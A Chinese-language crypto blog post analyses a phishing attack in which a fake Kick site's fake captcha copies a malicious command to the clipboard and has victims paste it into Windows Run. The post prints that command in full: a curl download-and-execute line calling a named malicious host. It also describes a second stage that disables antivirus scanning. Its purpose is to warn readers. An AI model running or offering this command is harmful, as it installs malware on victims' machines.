警惕网络钓鱼陷阱:一起分析最新木马攻击案例
上午在几个群里看到一个聊天记录,讲的是一位老哥上了假的钓鱼网站导致电脑中了木马资产被盗。我们来分析一下他被盗的流程。
如上聊天记录所示,他当时是访问了一个假的 kick 网站,网址如下:https://kick.com.im/
重要提醒:此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!
当我们访问此网站时,发现会出现一个是否是人类的验证,我们点击进行验证,会弹出以下提示:
我们来解释上图是让你做什么操作:
1、按下 Windows+R 打开运行对话框
Windows+R 是 windows 系统下的一个快键命令,用来快速地打开运行对话框的。此处就是让你准备执行恶意脚本文件。
2、按下 CTRL+V 粘贴验证文本
地球人都知道 CTRL+V 是用来粘贴的,在这一步大家是不是有个疑问,想 CTRL+V 之前得先 CTRL+C 进行复制呀,为什么没有复制直接就让粘贴了呢?
我们看看钓鱼网站前端的代码:
秘密就在这里,记得我们刚访问网站时让我们验证是否是人类,验证时得点鼠标,上面这段 js 代码就是检测鼠标的点击事件,当发现鼠标点击时就把恶意脚本自动地复制到粘贴板中,这时候不用 CTRL+C 就能直接 CTRL+V 了。
那粘贴板中的恶意代码是什么呢?
cmd /c "curl -k -L -Ss https://hcaptcha.ru/r -o "%TEMP%\ 1.cmd" "%TEMP%\ 1.cmd"" # Press OK or ENTER to complete verification. By pressing OK you confirm you are not a robot.
上面的代码意思是从 https://hcaptcha.ru/r(重要提醒:此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!)下载文件存到临时目录中,文件的名字叫“ 1.cmd”,然后执行此文件。
打开下载后的文件发现是如下的代码:
这段恶意代码首先会检查是否有管理员权限,当有管理员权限后会尝试将此脚本提升为管理员权限。
第二部分那一坨代码用 Base 64 进行了编码,当解码后发现功能是将 C:\排除在防病毒扫描之外。这步的目的是告诉杀毒软件“C:|你就不要扫描啦!”,这样当木马在 C 盘执行时就不会被杀毒软件发现。
第三部分代码 gpt 也没有解析出来,大致的用处就是从某一网站上下载木马到 C 盘,然后执行木马,这里就需要 @evilcos 老师等各位安全专家进行具体的分析。
针对上述钓鱼骗局我们可以得到如下的经验:
1、访问任何不熟悉的网址前一定要多验证网址的正确性。像上文中的受害者把钓鱼网站当成了 kick 直播的网址,kick 的官方网址是 https://kick.com/,如果受害者去 google 上搜索或者询问 gpt 也就不会上当。
2、执行每一步操作前都要慎重,要想明白这步操作的用处是什么,当我们不懂或者不清楚时,要善于用 GPT 等 AI 工具。
Web3处处是陷阱,希望大家都能避开各种坑。
- 1每日投行与机构观点汇总(2025年6月6日)
- 224小时币圈热点与要闻 | 特朗普与马斯克“互撕”风波;Circle上市首日表现亮眼
- 3 千变万化:马斯克会把特朗普踢出X吗?以及以太坊和法网公开赛预测
- 4马斯克与特朗普关系破裂:特斯拉市值单日蒸发1500亿美元
- 5 爸爸直播宝宝“索拉娜”出生,引发网友热议——但事情变得奇怪了
- 6美国众议院金融服务委员会将于6月10日审议CLARITY法案
- 7香港《稳定币条例》将于2025年8月1日正式生效
- 8 “一个不同的时代”:无聊猿创始人 Yuga Labs 想要摧毁 ApeCoin DAO
- 9 Arca 在 IPO 和纽约证券交易所上市后向 Circle 致以“最良好的祝愿”:“祝你成功”